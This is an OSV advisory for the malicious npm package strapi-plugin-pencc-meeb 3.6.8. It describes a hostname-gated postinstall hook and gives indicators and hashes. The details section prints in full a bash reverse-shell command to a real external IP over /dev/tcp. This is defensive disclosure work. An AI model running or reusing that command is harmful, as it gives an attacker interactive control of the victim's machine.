MAL-2026-16210

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-pencc-meeb/MAL-2026-16210.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16210
Published
2026-09-16T06:29:25Z
Modified
2026-09-16T06:45:06Z
Summary
Malicious code in strapi-plugin-pencc-meeb (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208)

postinstall.js is registered as the package's postinstall script and runs automatically on npm install. It compares os.hostname() to the hardcoded string 'ubuntu-fc-uvm' and, on a match, executes bash -c "bash -i >& /dev/tcp/14.225.210.85/80 0>&1" via child_process, opening an interactive reverse shell to 14.225.210.85 on TCP port 80. The script includes retry logic and writes to /tmp/postinstall-revshell.log. The hostname gate suppresses activity on non-matching hosts, but the payload is shipped in every install of this version.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020078",
            "import_time": "2026-09-16T06:31:14.766556516Z",
            "modified_time": "2026-09-16T06:29:25Z",
            "sha256": "3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-pencc-meeb

Package

Name
strapi-plugin-pencc-meeb
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-pencc-meeb

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "59958a5b6cf205abf8e3c05e62d883c008dafcd91abe907dda3d0f2bdb95a5a2",
            "tlsh": "ef411eed05bf2b3962338ce9522b8097d52741023516d278b5dc8b43bfc4d9ac631afa"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-pencc-meeb-3.6.8.tgz",
            "hashes": {
                "sha1": "9053e329b3b19eaf664334186b54294f518f5494",
                "sha512_sri": "sha512-TcRaK6QGbWYnkJfPhmjfXvmsMvn//4z/tPPyQuWOe+ZD7jNMBmpI+boMMbAj8lIkvYZekDRLx7KBi4voOwMaQA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-pencc-meeb/MAL-2026-16210.json"